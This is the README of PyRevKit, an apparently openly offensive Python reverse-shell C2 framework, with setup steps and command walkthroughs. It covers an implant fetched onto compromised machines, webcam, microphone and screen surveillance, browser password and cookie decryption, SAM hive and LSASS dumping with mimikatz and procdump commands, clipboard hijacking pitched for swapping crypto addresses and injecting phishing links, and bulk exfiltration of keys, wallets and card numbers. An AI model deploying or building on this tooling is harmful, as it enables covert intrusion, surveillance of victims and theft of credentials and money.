A python coded feature-rich reverse shell C2 framework with encrypted WebSocket communication, comprehensive reconnaissance capabilities, advanced credential harvesting, browser data extraction with decryption, bi-directional file transfer, desktop surveillance with screenshots and webcam/audio capture.
- Secure Communication: TLS/SSL encrypted WebSocket connections
- Authentication: PBKDF2-SHA256 hashed credentials with salting
- File Transfer: Bidirectional file upload/download with base64 encoding
- Auto-Reconnection: Exponential backoff retry mechanism
- Persistent Targets: Targets remain connected between operator sessions
- Multi-Session: Multiple operators can connect to the same target sequentially
- Numbered Target Selection: Visual list of connected targets with quick number-based selection
- Safe Execution: Command timeout protection (30s default)
- File Search: Search files by name pattern with customizable limits
- Content Search: Search inside text files for sensitive data
- System Information: System profiling with 10+ categories: uptime, admin status, all users, groups, listening ports, security software (AV/Firewall/UAC), processes, installed software, domain info, VM detection, scheduled tasks
- Clipboard Access: Read and write clipboard content on target machines
- Credential Harvesting: Extract WiFi passwords, enumerate browser credentials, harvest application credentials (FileZilla, PuTTY, WinSCP), Windows SAM/LSASS guidance
- Browser Password Decryption: Edge/Chrome v10/v11 with v20 detection
- Registry Dump via VSS: SAM/SYSTEM/SECURITY hives for offline hash extraction
- WiFi Credentials: Saved wireless network passwords
- Windows Mail Export via VSS: Complete email database extraction
- Application Credentials: FileZilla, PuTTY, WinSCP enumeration
- History, Cookies, Bookmarks, Downloads: Extract from Chrome, Edge, Firefox
- Automatic Cookie Decryption: v10/v11/DPAPI decryption (seamless integration)
- VSS Integration: Bypasses locked databases when browser is running
- Smart Fallback: Direct copy β VSS fallback β automatic cleanup
- Pattern-Based Exfiltration: Documents, credentials, source code, custom patterns
- VSS File Access: Access locked files via shadow copies
- Directory Listing: Recursive file system exploration
- File Search: Name and content-based searching
- Screenshot Capture: Full-resolution desktop screenshots
- Live Desktop Streaming: Real-time monitoring at ~5 FPS with concurrent command execution
- Webcam Capture: Target webcam photo capture
- Audio Recording: Microphone recording (1-300 seconds)
- Automatic Storage: All media saved in
loot/directory
- Installation
- Quick Start
- Architecture
- Usage (Commands)
- Configuration
- Troubleshooting
- System Information Issues
- Platform Specific Notes
- Legal Disclaimer
- License
PyRevKit has three components with different dependencies:
Required on the machine running pyrev_server.py:
- Python 3.7+
websocketslibrary- SSL certificate (
server.pem)
# Put pyrev_server.py on the C2 and install websockets
wget 'https://raw.githubusercontent.com/infosecm/PyRevKit/refs/heads/main/pyrev_server.py'
pip install websockets
# Generate SSL certificate
openssl req -x509 -newkey rsa:4096 -nodes -out server.pem -keyout server.pem -days 365No optional dependencies needed - server just relays commands.
Required on the operator's machine running pyrev_client.py:
- Python 3.7+
websocketslibrary
# You may clone the repository, although only pyrev_client.py is needed. You must also install websockets.
git clone https://github.com/yourusername/pyrevkit.git
pip install websocketsNo optional dependencies needed - client just sends commands.
Required on ALL target machines running pyrev_target.py:
Core (Required):
- Python 3.7+
websocketslibrary
# Copy only pyrev_target.py to compromised machine and install websockets.
wget 'https://raw.githubusercontent.com/infosecm/PyRevKit/refs/heads/main/pyrev_target.py'
pip install websocketsOptional (only if using these features):
| Feature | Dependencies | When Needed |
|---|---|---|
| Cookies & password decryption | pycryptodome, pywin32 |
If using creds edge_decrypt, creds chrome_decrypt, browser cookies, browser cookies --save commands; Windows only; v10/v11 support only |
| Screenshots & desktop streaming | mss, pillow |
If using screenshot or stream_start command. mss required on Linux, optional on Windows/macOS (fallback to PIL.ImageGrab) |
| Webcam Capture | opencv-python |
If using webcam command |
| Audio Recording | sounddevice, scipy, numpy |
If using record command |
| Clipboard Access | pyperclip |
If using clipboard, clipboard monitor, clipboard set commands |
+ Linux: xclip or wl-clipboard |
On Linux targets |
# Browser cookie/password decryption (v10/v11)
pip install pycryptodome pywin32
# Screenshots & desktop streaming
pip install mss pillow
# For media capture (webcam + audio)
pip install opencv-python sounddevice scipy numpy
# For clipboard features
pip install pyperclip
# Linux clipboard support
sudo apt-get install xclip # For X11
# or
sudo apt-get install wl-clipboard # For WaylandKey Points:
- β VSS features require Administrator privileges on target
- β v20 cookie decryption is not supported (documented below)
- β
Most features work with just
websocketsinstalled
# Add operator credentials on C2 server
python pyrev_server.py -creds operator admin SecurePassword123!
# Add target credentials on C2 server
python pyrev_server.py -creds target machineA TargetPassword456!Credentials are stored in credentials.json with PBKDF2-SHA256 hashing:
{
"operator": {
"admin": {
"hash": "0b2ad92a1f3e68487a780b3c6d7ab33c...",
"salt": "e48cbd452e38b9337130dcb82f3b761c..."
}
},
"target": {
"machineA": {
"hash": "f61a20f536c15913156a282b3eb84b03...",
"salt": "ff789cd49679ebadd2f60b02094ae21b..."
}
}
}python pyrev_server.py [OPTIONS]Options:
-creds ROLE LOGIN PASSWORD- Add/update credentials-host HOST- Server host (default: 0.0.0.0)-port PORT- Server port (default: 8765)-cert FILE- SSL certificate file (default: server.pem)
# Usage example
python pyrev_server.py -host 192.0.2.1 -port 8765 -cert server.pemOutput example:
[+] Directories ready: loot/, payloads/
[+] Server running on wss://192.0.2.1:8765
[+] Credentials file: credentials.json
[+] Loot directory: loot/
[+] Payloads directory: payloads/
python pyrev_target.pyEdit the configuration section in pyrev_target.py:
# ========== CONFIGURATION ==========
TARGET_ID = "machineA"
SERVER_HOST = "192.0.2.1"
SERVER_PORT = 8765
AUTO_LOGIN = "machineA" # Fill for auto-connect
AUTO_PASSWORD = "TargetPass456" # Fill for auto-connect
# ====================================Then simply run:
python pyrev_target.pyOutput:
[+] Auto-connecting to 192.0.2.1:8765 as machineA
[+] Connected and authenticated. Waiting for commands...
Not providing values for AUTO_LOGIN and AUTO_PASSWORD will make pyrev_target.py run in interactive mode:
Server host [192.0.2.1]:
Server port [8765]:
--- Authentication ---
Login: machineA
Password: [hidden]
[SERVER] Authentication successful. Waiting for commands...
[+] Target agent ready. Waiting for commands...
python pyrev_client.pyNew interactive target selection:
Server host [192.0.2.1]:
Server port [8765]:
--- Authentication ---
Login: admin
Password: [hidden]
[+] Connected to server
[+] Authentication successful
============================================================
CONNECTED TARGETS
============================================================
[1] machineA
[2] machineB
[3] prod-web-01
============================================================
Select target [number or name]: 1
[*] Connecting to target: machineA
[SERVER] Connected to target 'machineA'
============================================================
β Interactive session started
Type 'help' for available commands
Type 'exit' to quit
============================================================
>>> whoami
victim-pc
>>>
βββββββββββββββββββ ββββββββββββββββββ ββββββββββββββββββ
β Operator β β C2 Server β β Target β
β ββββββββββΊβ - Auth ββββββββββΊβ |
β β WSS β - Relay β WSS β β
β pyrev_client β β - Files β β pyrev_target β
βββββββββββββββββββ β β ββββββββββββββββββ
| pyrev_server | |
ββββββββββββββββββ downloads/
β
ββββββββ΄βββββββ
β β
loot/ payloads/
>>> download /etc/passwd
[*] Requesting download: /etc/passwd
[β] Downloaded passwd (2.45 KB) β loot/machineA_passwdFiles are downloaded from the target to the C2 server's loot/ folder.
Features:
- Automatic renaming with target prefix
- Size display
- Max file size: 50MB
- Supports absolute and relative paths
>>> upload exploit.sh
[*] Uploading: exploit.sh
[β] Saved exploit.sh (5.67 KB) β downloads/exploit.shFiles are uploaded from the server's payloads/ directory to the target's downloads/ folder.
# List downloaded files in the C2 server's loot/ folder
>>> ls_loot
Files in loot/:
- machineA_passwd (2.45 KB)
- machineA_audio_20260407_003625.wav (5168.01 KB)
# List available files in the C2 server's payloads/ folder
>>> ls_payloads
Files in payloads/:
- exploit.sh (5.67 KB)
- payload.exe (234.56 KB)
# List available files in the target's downloads/ folder
>>> ls_downloads
[*] Listing downloads directory...
Files in downloads/ directory:
- screenshot_20260407_003520.png (452.85 KB)
π‘ Download with: download screenshot_20260407_003520.pngCapture photos from the target's webcam:
>>> webcam
[*] Capturing webcam...
[β] Webcam captured (156.78 KB) β loot/machineA_webcam_20260403_143022.jpgFeatures:
- JPEG format
- Native webcam resolution
- Automatic timestamped naming
- Saved to
loot/directory
Requirements:
- Target must have
opencv-pythoninstalled:pip install opencv-python - Webcam must be accessible (not used by another application)
Record audio from the target's microphone:
>>> record 30
[*] Recording 30 seconds of audio...
[β] Audio recorded (5.05 MB) β loot/machineA_audio_20260403_143522.wavParameters:
- Duration: 1 to 300 seconds (5 minutes max)
- Format: WAV, 44.1kHz, 16-bit, stereo
- Approximate size: ~170 KB per second
Examples:
>>> record 10 # 10 seconds (~1.7 MB)
>>> record 60 # 1 minute (~10 MB)
>>> record 300 # 5 minutes (max, ~50 MB)Requirements:
- Target must have audio libraries installed:
pip install sounddevice scipy numpy
Takes screenshot from the target's display
>>> screenshot
[*] Capturing screenshot...
[β] Screenshot captured (452.85 KB) β loot\machineA_screenshot_20260407_003520.pngRequirements:
- Target must have mss library installed:
pip install mssStreams a continuous flow of screenshots at ~5 FPS with concurrent commands supported.
>>> stream_start
[*] Starting desktop stream...
[*] Desktop stream started from machineA
[*] Stream frames will be saved in loot/ directory
[*] You can continue using commands while streaming
[*] Use 'stream_stop' to end the stream
>>> stream_stop
[*] Stopping desktop stream...
[*] Desktop stream stoppedRequirements:
- Target must have mss library installed:
pip install mssSearch for files by name pattern:
>>> search *.pdf
[*] Searching for files: *.pdf
[β] Found 15 results:
1. C:\Users\John\Documents\report.pdf (523.45 KB)
2. C:\Users\John\Desktop\invoice.pdf (102.34 KB)
...With custom limit:
>>> search *.pem --limit 20
[*] Searching for files: *.pem (limit: 20)
[β] Found 20 results:
1. /home/user/cert1.pem (5.61 KB)
...
20. /home/user/cert20.pem (3.24 KB)Supported patterns:
*.pdf- All PDF files*.docx- All Word documentspassword*- Files starting with "password"*config*- Files containing "config"secret.txt- Specific file
Default limit: 100 results (use --limit N to customize)
Search inside text files for sensitive data:
>>> search --content "password"
[*] Searching for content: password
[β] Found 8 results:
1. C:\config.txt:45
database_password=admin123
2. C:\Users\John\notes.txt:12
Remember to change password next week
...With custom limit:
>>> search --content "api_key" --limit 15
[*] Searching for content: api_key (limit: 15)
[β] Found 45 results:
1. /app1/config.json:23
"api_key": "sk_live_abc123..."
...
15. /app12/config.json:43
"api_key": "s8jdggkdvt..."Supported file types:
- Text files:
.txt,.log,.conf,.config,.ini - Code files:
.py,.sh,.bat,.cmd - Data files:
.xml,.json
Limitations:
- Max file size: 10MB per file
- Text files only (binary files skipped)
Gather comprehensive system information for reconnaissance and profiling:
>>> sysinfo
[*] Gathering system information...
[β] System Information - prod-web-01
βββ SYSTEM βββ
Os: Windows
Os Version: 10.0.19045
Os Release: 10
Hostname: PROD-WEB-01
Architecture: AMD64
Processor: Intel Core i7-9700K @ 3.60GHz
Python Version: 3.11.0
Platform: Windows-10-10.0.19045-SP0
Uptime: 15d 3h 42m
Uptime Seconds: 1317720
βββ CURRENT USER βββ
Username: jdoe
Home: C:\Users\jdoe
Administrator/Root: YES
Groups: Administrators, Remote Desktop Users
βββ ALL USERS βββ
Total: 8
1. Administrator
2. jdoe
3. sql_service
4. backup_admin
5. Guest
...
βββ NETWORK βββ
Hostname: PROD-WEB-01
Local Ip: 192.168.1.100
Listening Ports (12 total):
- 0.0.0.0:135
- 0.0.0.0:445
- 0.0.0.0:3389
- 0.0.0.0:5357
...
Listening Count: 12
βββ SECURITY βββ
Antivirus: Windows Defender (Enabled)
Firewall: Enabled
Uac: Enabled
βββ PROCESSES βββ
Total Running: 156
Security-Related Processes:
- MsMpEng.exe (Windows Defender)
- SecurityHealthService.exe
βββ INSTALLED SOFTWARE βββ
Detected Applications:
- Google Chrome
- Microsoft Office
- Python
- Java
βββ STORAGE βββ
C:: 120.5GB free / 512.0GB total
D:: 450.2GB free / 1024.0GB total
βββ DOMAIN INFO βββ
Name: CORP.LOCAL
Is Joined: True
βββ VIRTUALIZATION βββ
VM Detected: YES (vmware)
βββ SCHEDULED TASKS βββ
User Tasks: 3
- \BackupScript
- \DatabaseMaintenanceComprehensive information collected:
System Details:
- Operating system and version
- Hardware specifications (CPU, architecture)
- System uptime (days, hours, minutes)
- Platform information
- Python version
User Information:
- Current username and home directory
- Administrator/Root privileges (critical for privilege escalation assessment)
- Group memberships (Administrators, sudo, wheel, etc.)
- Complete list of all local users (identify service accounts, admin accounts)
Network Configuration:
- Hostname and local IP address
- Listening ports (exposed services: RDP, SMB, SSH, etc.)
- Active network interfaces
- Port count for attack surface assessment
Security Posture:
- Antivirus status (Windows Defender, etc.)
- Firewall status (enabled/disabled on all profiles)
- UAC level (Windows User Account Control)
- SELinux status (Linux - Enforcing/Permissive/Disabled)
Processes & Services:
- Total running processes
- Security-related processes (AV, EDR, security tools)
- Detection of: Defender, CrowdStrike, SentinelOne, McAfee, etc.
Installed Software:
- Common applications detected (Chrome, Office, Python, Java, etc.)
- Package manager information (Linux)
- Package count
Storage:
- All drives/mounts with free and total space
- Disk usage analysis
Domain Information (Windows):
- Domain name
- Domain-joined status (vs Workgroup)
- Useful for Active Directory enumeration
Scheduled Tasks:
- User-created scheduled tasks (Windows)
- Crontab entries (Linux/macOS)
- Persistence opportunity identification
Virtualization:
- VM detection (VMware, VirtualBox, Hyper-V, KVM, Xen)
- Physical vs virtual machine identification
Environment Variables:
- Important system paths
- Development environment indicators
Platform Support:
- β Windows: Full feature set (all categories)
- β Linux: Full feature set (except Domain, UAC - as expected)
- β macOS: Full feature set (except Domain, UAC - as expected)
No additional dependencies required - uses Python standard library only.
Perfect for:
- Initial reconnaissance
- Privilege escalation planning
- Attack surface mapping
- Security posture assessment
- Finding service accounts and admin users
- Identifying persistence opportunities
Capture clipboard content from the target:
>>> clipboard
[*] Reading clipboard...
[β] Clipboard content:
MySecretPassword123!Use cases:
- Capture copied passwords
- Intercept copied credentials
- Monitor user activity
- Capture API keys and tokens
Inject content into the target's clipboard:
>>> clipboard set "Hello from operator"
[*] Setting clipboard...
[β] Clipboard updatedUse cases:
- Replace cryptocurrency addresses
- Inject phishing URLs
- Modify copied commands
- Social engineering attacks
Continuously monitor clipboard changes in real-time with timestamps. Target stores captures in memory, client polls on demand.
Start Monitoring:
>>> clipboard monitor 300
[*] Monitoring clipboard for 300 seconds...
[*] Target monitors in background
[*] Use 'clipboard check' to see new captures
[+] Monitoring clipboard... (duration: 300s)
>>>Check for New Captures:
>>> clipboard check
[2026-04-04 23:56:05] Copied: password123
[2026-04-04 23:56:18] Copied: admin@company.com
[2026-04-04 23:56:35] Copied: secret_key_xyz
>>>
# Check again later
>>> clipboard check
[2026-04-04 23:57:12] Copied: api_token_abc
>>>
# No new captures
>>> clipboard check
[*] No new clipboard captures
>>>Note: Shows only NEW captures since last check. Maintains index automatically.
- Flexible - Check captures as often or rarely as you want
- Auto-stop - Automatically stops after specified duration
Requirements:
- Target must have
pyperclipinstalled:pip install pyperclip - Graphical environment required (not headless servers)
- Linux: Requires
xcliporxsel:
sudo apt-get install xclipExtract and enumerate credentials from various sources on the target machine.
>>> creds wifi
[*] Harvesting wifi credentials...
[β] Credential Harvesting - WIFI
WiFi Networks (5 found):
SSID: HomeNetwork
Password: MySecurePassword123
SSID: Office_WiFi
Password: Company2024!
SSID: Guest_Network
Password: [No password or encrypted]What it extracts:
- Windows: Uses
netsh wlanto extract saved WiFi passwords (up to 20 profiles) - Linux: Reads NetworkManager configuration files from
/etc/NetworkManager/system-connections/
>>> creds browsers
[*] Harvesting browsers credentials...
[β] Credential Harvesting - BROWSERS
CHROME:
Found: Yes
Count: 45
Location: C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data
FIREFOX:
Found: Yes
Count: 23
Location: C:\Users\jdoe\AppData\Roaming\Mozilla\Firefox\Profiles\abc.default
EDGE:
Found: Yes
Count: 12
Location: C:\Users\jdoe\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Note: Actual password decryption requires additional toolsWhat it enumerates:
- Google Chrome - Counts stored credentials and shows database location
- Mozilla Firefox - Enumerates logins from profiles
- Microsoft Edge - Windows only, shows credential count
Note: This command counts credentials but does NOT decrypt passwords. Download the database files and use offline 3rd party tools like LaZagne, SharpChrome, or firefox_decrypt.py for actual password extraction, or you can try extracting passwords with the following commands:
>>> creds edge_decrypt
[*] Harvesting edge_decrypt credentials...
[β] Credential Harvesting - EDGE_DECRYPT
Browser: Edge
Total Credentials: 9
Decrypted (v10/v11): 2
App-Bound (v20): 7
β οΈ Edge uses App-Bound Encryption (v20) for newer passwords
βββ DECRYPTED PASSWORDS (v10/v11) βββ
URL: https://github.com
Username: john.doe@company.com
Password: GitHubPass2024!
Version: v10
URL: https://outlook.office365.com
Username: jdoe@corp.local
Password: C0rpMail#2023
Version: v11
βββ APP-BOUND ENCRYPTED (v20) βββ
7 password(s) could not be decrypted (App-Bound Encryption)
[v20 App-Bound - Export Required]
π‘ To export v20 passwords:
1. Open Edge
2. Go to: edge://settings/passwords
3. Click β― (three dots) next to "Saved passwords"
4. Click "Export passwords"
5. Save as CSV file>>> creds chrome_decrypt
[*] Harvesting chrome_decrypt credentials...
[β] Credential Harvesting - CHROME_DECRYPT
Browser: Chrome
Total Credentials: 3
Decrypted (v10/v11): 3
App-Bound (v20): 0
βββ DECRYPTED PASSWORDS (v10/v11) βββ
URL: https://github.com
Username: jdoe
Password: gh_p4ssw0rd!42
Version: v10
URL: https://mail.google.com
Username: john.doe@gmail.com
Password: Gm4ilP@ss2024
Version: v10
URL: https://gitlab.corp.local
Username: jdoe
Password: G!tl4bR00t#99
Version: v11β If running v10/v11, Edge passwords will be decrypted. β We do not provide support for V20 Edge passwords decryption.
# Dump SAM/SYSTEM/SECURITY hives via VSS
>>> creds registry_dump_vss
[*] Harvesting registry_dump_vss credentials...
[β] Credential Harvesting - REGISTRY_DUMP_VSS
ββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β REGISTRY HIVES DUMPED VIA VSS β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Method: Volume Shadow Copy (VSS)
Hives Dumped: SAM, SYSTEM, SECURITY
Total Hives: 3/3
Filename: registry_dump_20260412_232852.zip
Location: downloads\registry_dump_20260412_232852.zip
Original Size: 21.94 MB
ZIP Size: 4.18 MB
Compression: 80.9%
π‘ Download with:
>>> download registry_dump_20260412_232852.zip
π Extract credentials with:
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Or use Impacket:
python3 secretsdump.py -sam SAM -system SYSTEM LOCALVSS Registry Dump Workflow:
- Creates VSS snapshot of system drive
- Copies registry hives from shadow:
C:\Windows\System32\config\SAMC:\Windows\System32\config\SYSTEMC:\Windows\System32\config\SECURITY
- Creates ZIP archive
- Automatic cleanup
Other harvesting methods:
# 2. If admin, upload dumping tool
>>> upload mimikatz.exe
# 3. Execute manually
>>> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
# Or use ProcDump
>>> upload procdump64.exe
>>> procdump64.exe -accepteula -ma lsass.exe lsass.dmp
>>> download lsass.dmp>>> creds applications
[*] Harvesting applications credentials...
[β] Credential Harvesting - APPLICATIONS
FILEZILLA:
Found: Yes
- file: recentservers.xml
note: Contains FTP credentials (plaintext in XML)
- file: sitemanager.xml
note: Contains FTP credentials (plaintext in XML)
PUTTY:
Found: Yes
Sessions: prod-server, dev-db, backup-host
Note: Session names found in registry (passwords not stored by PuTTY)
WINSCP:
Found: Yes
Location: C:\Users\jdoe\AppData\Roaming\WinSCP.ini
Note: Contains encrypted passwords (can be decrypted with tools)What it finds:
- FileZilla - FTP credentials stored in plaintext XML (passwords are base64 encoded)
- PuTTY - SSH session names from Windows Registry (no passwords stored)
- WinSCP - Encrypted passwords in config file (can be decrypted with tools)
# Show first 50 history entries
>>> browser history
[*] Extracting browser history...
[β] Browser HISTORY - First 50 Entries
βββ CHROME (21 entries) βββ
[1] https://github.com/corp/internal-api
Title: corp/internal-api: Internal REST API Β· GitHub
Visits: 14 | Last: 2026-04-13 09:14:22
[2] https://mail.google.com/mail/u/0/
Title: Inbox - john.doe@gmail.com
Visits: 87 | Last: 2026-04-13 08:55:01
[...]
βββ EDGE (18 entries) βββ
[1] https://outlook.office365.com/mail/inbox
Title: Mail - John Doe - Outlook
Visits: 61 | Last: 2026-04-13 09:02:14
[2] https://corp.sharepoint.com/sites/IT/Documents/Forms/AllItems.aspx
Title: Documents - IT - SharePoint
Visits: 9 | Last: 2026-04-13 08:44:58
[...]
βββ FIREFOX (11 entries) βββ
[1] https://stackoverflow.com/questions/74821966
Title: python - asyncio websocket connection drops after idle - Stack Overflow
Visits: 3 | Last: 2026-04-13 07:30:19
[2] https://docs.python.org/3/library/asyncio-task.html
Title: Coroutines and Tasks β Python 3.12 documentation
Visits: 8 | Last: 2026-04-12 21:14:55
[...]
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
Total shown: 50 entries across 3 browsers
π‘ Export all entries with: browser history --save# Save all history to file β downloads/browser_history_TIMESTAMP.txt
>>> browser history --save
[*] Extracting browser history and saving to file...
[β] Browser HISTORY - Complete Data Saved to File
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β FILE SAVED SUCCESSFULLY β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Filename: browser_history_20260413_000731.txt
Location: downloads\browser_history_20260413_000731.txt
Size: 1639.17 KB
Total Entries: 4638
π‘ Download this file with:
>>> download downloads\browser_history_20260413_000731.txtβ No LIMIT - saves everything
# Show first 50 cookies with decryption attempt
>>> browser cookies
[*] Extracting browser cookies...
[β] Browser COOKIES - First 50 Entries (decryption enabled)
βββ CHROME (23 entries) βββ
[1] Host: .github.com
Name: user_session
Value: abc12XqT9mNp3vKwRsLu7fY...
Decrypted: Yes (v10)
Expires: 1776643200
[2] Host: .google.com
Name: SID
Value: g.a000pQrKtY8mZxL3bNc...
Decrypted: Yes (v10)
Expires: 1807747200
[...]
βββ EDGE (19 entries) βββ
[1] Host: .office365.com
Name: ESTSAUTH
Value: [v20 App-Bound]
Expires: 1776643200
[2] Host: .sharepoint.com
Name: FedAuth
Value: 77u/PD94bWwgdmVyc2...
Decrypted: Yes (v10)
Expires: 1776729600
[...]
βββ FIREFOX (8 entries) βββ
[1] Host: .stackoverflow.com
Name: prov
Value: 4a3b2c1d-e5f6-7890-ab...
Expires: 1902355200
[2] Host: 10.0.0.5
Name: session_id
Value: 8f3d1a9c2e74b056...
Expires: 0
[...]
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
Total shown: 50 entries across 3 browsers
β
v10/v11 cookies automatically decrypted
β v20 App-Bound cookies cannot be decrypted
π‘ Export all cookies with: browser cookies --save# Save all cookies with decryption β downloads/browser_cookies_TIMESTAMP.txt
>>> browser cookies --save
[*] Extracting browser cookies and saving to file...
[β] Browser COOKIES - Complete Data Saved to File
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β FILE SAVED SUCCESSFULLY β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Filename: browser_cookies_20260413_000958.txt
Location: downloads\browser_cookies_20260413_000958.txt
Size: 264.73 KB
Total Entries: 2858
π‘ Download this file with:
>>> download downloads\browser_cookies_20260413_000958.txtβ No LIMIT - saves everything β Automatic decryption integrated β Uses VSS if database locked β v20 unsupported; shows as [v20 App-Bound]
Encryption Version Support
| Version | Encryption Method | Decryption Support | Status |
|---|---|---|---|
| v10 | AES-256-GCM | β Full Support | Uses master key from Local State |
| v11 | AES-256-GCM | β Full Support | Same as v10 |
| v20 | App-Bound Encryption | β Cannot Decrypt | Service-managed, hardware-backed |
| DPAPI | Windows DPAPI | β Full Support | Legacy encryption |
| Plaintext | None | β Direct Read | Some cookies stored unencrypted |
β Benefits:
- Bypasses file locks (works with apps running)
- Looks like legitimate backup operation
- No direct process interaction needed
- VSS operations logged in Windows Event Logs (Event ID 8222, 8224)
- EDR/AV may monitor VSS API calls
- SIEM may alert on unusual VSS patterns
- Requires Admin privileges (elevation may be logged)
# Show first 50 bookmarks
>>> browser bookmarks
[*] Extracting browser bookmarks...
[β] Browser BOOKMARKS - First 50 Entries
βββ CHROME (24 entries) βββ
[1] Name: Internal API Docs
URL: https://corp.github.io/internal-api/docs
[2] Name: Jenkins CI
URL: https://jenkins.corp.local:8080
[...]
βββ EDGE (17 entries) βββ
[1] Name: Microsoft 365 Admin
URL: https://admin.microsoft.com
[2] Name: Azure AD - Users
URL: https://portal.azure.com/#blade/Microsoft_AAD_IAM/UsersManagementMenuBlade
[...]
βββ FIREFOX (9 entries) βββ
[1] Name: Python asyncio docs
URL: https://docs.python.org/3/library/asyncio.html
[2] Name: Docker Hub
URL: https://hub.docker.com
[...]
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
Total shown: 50 entries across 3 browsers
π‘ Export all bookmarks with: browser bookmarks --save# Save all bookmarks to file β downloads/browser_cookies_TIMESTAMP.txt
>>> browser bookmarks --save
[*] Extracting browser bookmarks and saving to file...
[β] Browser BOOKMARKS - Complete Data Saved to File
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β FILE SAVED SUCCESSFULLY β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Filename: browser_bookmarks_20260413_000421.txt
Location: downloads\browser_bookmarks_20260413_000421.txt
Size: 392.14 KB
Total Entries: 2440
π‘ Download this file with:
>>> download downloads\browser_bookmarks_20260413_000421.txtβ No LIMIT - saves everything
# Show first 50 downloads history entries
>>> browser downloads
[*] Extracting browser downloads...
[β] Browser DOWNLOADS - First 50 Entries
βββ CHROME (22 entries) βββ
[1] File: C:\Users\jdoe\Downloads\ssh_keys_backup.zip
URL: https://corp.github.io/infra/releases/download/v1.2/ssh_keys_backup.zip
Size: 14336 bytes | Date: 2026-04-13 08:21:05
[2] File: C:\Users\jdoe\Downloads\PuTTY_sessions_export.reg
URL: https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.82-installer.msi
Size: 3540 bytes | Date: 2026-04-12 17:44:31
[...]
βββ EDGE (20 entries) βββ
[1] File: C:\Users\jdoe\Downloads\AzureAD_users_export.csv
URL: https://portal.azure.com/api/export/users/csv
Size: 52224 bytes | Date: 2026-04-13 09:01:44
[2] File: C:\Users\jdoe\Downloads\BitLocker_recovery_keys.docx
URL: https://corp.sharepoint.com/sites/IT/Documents/BitLocker_recovery_keys.docx
Size: 28672 bytes | Date: 2026-04-12 16:55:11
[...]
βββ FIREFOX (8 entries) βββ
[1] File: C:\Users\jdoe\Downloads\docker-compose.yml
URL: https://raw.githubusercontent.com/corp/devops/main/docker-compose.yml
Size: 3712 bytes | Date: 2026-04-12 20:03:55
[2] File: C:\Users\jdoe\Downloads\id_rsa
URL: http://10.0.0.5:8080/api/keys/download/id_rsa
Size: 1679 bytes | Date: 2026-04-12 19:49:21
[...]
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
Total shown: 50 entries across 3 browsers
π‘ Export all download history with: browser downloads --save
...# Save all download history entries to file β downloads/browser_cookies_TIMESTAMP.txt
>>> browser downloads --save
[*] Extracting browser downloads and saving to file...
[β] Browser DOWNLOADS - Complete Data Saved to File
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β FILE SAVED SUCCESSFULLY β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Filename: browser_downloads_20260413_000545.txt
Location: downloads\browser_downloads_20260413_000545.txt
Size: 27.94 KB
Total Entries: 128
π‘ Download this file with:
>>> download downloads\browser_downloads_20260413_000545.txtβ No LIMIT - saves everything
# Auto-find sensitive files
# '*.kdbx', # KeePass databases
# ' *.ppk', # PuTTY private keys
# '*.pem', # SSL certificates / SSH keys
# '*.key', # Generic key files
# '*.p12', # PKCS12 certificates
# '*.pfx', # Windows certificates
# '*wallet.dat', # Cryptocurrency wallets
# '*.ovpn', # OpenVPN configs
# '*password*', # Files with 'password' in name
# '*secret*', # Files with 'secret' in name
# '*credential*',# Files with 'credential' in name
# '*.rdp', # Remote Desktop configs
# 'id_rsa', # SSH private key
# 'id_dsa', # SSH private key
# 'id_ecdsa', # SSH private key
# 'id_ed25519', # SSH private key
>>> exfil auto
[*] Smart exfiltration mode: auto
[β] Smart Exfiltration - AUTO
Sensitive Files Found: 50
1. 1CA9E47175BB14B3CE13C27C0C1A5F8C3BB7D83A.key
Path: C:\Users\jdoe\.gnupg\private-keys-v1.d\1CA9E47175BB14B3CE13C27C0C1A5F8C3BB7D83A.key
Size: 3.93 KB
Matched: *.key
[...]
Use download command to retrieve specific files# Search for SSN, credit cards, keys
# ssn: r'\b\d{3}-\d{2}-\d{4}\b'
# credit_card: r'\b\d{4}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b'
# api_key: r'["\']?[a-zA-Z0-9_-]{32,}["\']?'
# aws_key: r'AKIA[0-9A-Z]{16}'
# private_key: r'-----BEGIN (?:RSA |EC )?PRIVATE KEY-----'
# email: r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
# ipv4: r'\b(?:\d{1,3}\.){3}\d{1,3}\b'
>>> exfil patterns
[*] Smart exfiltration mode: patterns
[β] Smart Exfiltration - PATTERNS
Pattern Matches Found: 2 types
βββ IPV4 βββ
File: C:\Users\jdoe\\Documents\ip_address.txt
Count: 1
Samples: 172.45.2.123
βββ CREDIT_CARD βββ
File: C:\Users\jdoe\\Documents\payment.txt
Count: 1
Samples: 4131 1111 1411 1121# Compress a directory for easier exfiltration
>>> exfil compress C:\Users\jdoe\downloads
[*] Compressing directory: C:\Users\jdoe\downloads
[β] Smart Exfiltration - COMPRESS
Archive Created: exfil_downloads_20260413_180940.zip
Location: C:\Users\jdoe\AppData\Local\Temp\exfil_downloads_20260413_180940.zip
Size: 9.88 MB
Files Compressed: 11
Use download command to retrieve: download C:\Users\jdoe\AppData\Local\Temp\exfil_downloads_20260413_180940.zip# List email clients found
>>> msg email
[*] Extracting email data...
[β] Message Extraction - EMAIL_LIST
βββ OUTLOOK βββ
Status: Found
Path: C:\Users\jdoe\AppData\Roaming\Microsoft\Outlook
Data Files: None found
Note: No PST/OST files in Outlook directory
βββ WINDOWS_MAIL βββ
Status: Found
